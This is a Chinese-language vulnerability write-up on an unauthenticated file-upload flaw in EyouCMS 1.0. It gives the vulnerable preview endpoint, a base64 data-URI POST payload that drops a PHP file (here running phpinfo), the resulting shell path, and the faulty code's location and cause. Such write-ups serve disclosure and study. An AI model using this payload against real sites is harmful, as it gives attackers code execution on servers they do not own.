Eyoucms 1.0前台getshell

一、漏洞简介

官网:http://www.eyoucms.com/download/ Cms下载地址:http://www.eyoucms.com/eyoucms1.0.zip

二、漏洞影响

三、复现过程

老样子:先讲如何利用

url: http://test.eyoucms1.0.com/index.php/api/Uploadify/preview

构造: <?php phpinfo;

image

post: data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

image

Shell: http://test.eyoucms1.0.com/preview/ae85d74a721b0b8bd247bc31207a12e2.php

image

image

原理分析

漏洞文件: eyoucms1.0\application\api\controller\Uploadify.php 漏洞函数:preview()

image

image

这里我将每行有意义的代码都解释了一下帮助读者进行查看。

而我刚开始时也思考了一下,这会不会是作者故意搞的后门? 带着这个问题我去问了一下加的php群的一些程序员 他们很惊讶的 表示data:image/ 居然还可以不是图片? 好吧。到这里我就基本明白为什么这个漏洞会出现了,估计作者以为data:image/ 只能是图片。

四、参考链接

https://www.yuque.com/pmiaowu/bfgkkh/kbh8mh

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-19 11:51:44

results matching ""

    No results matching ""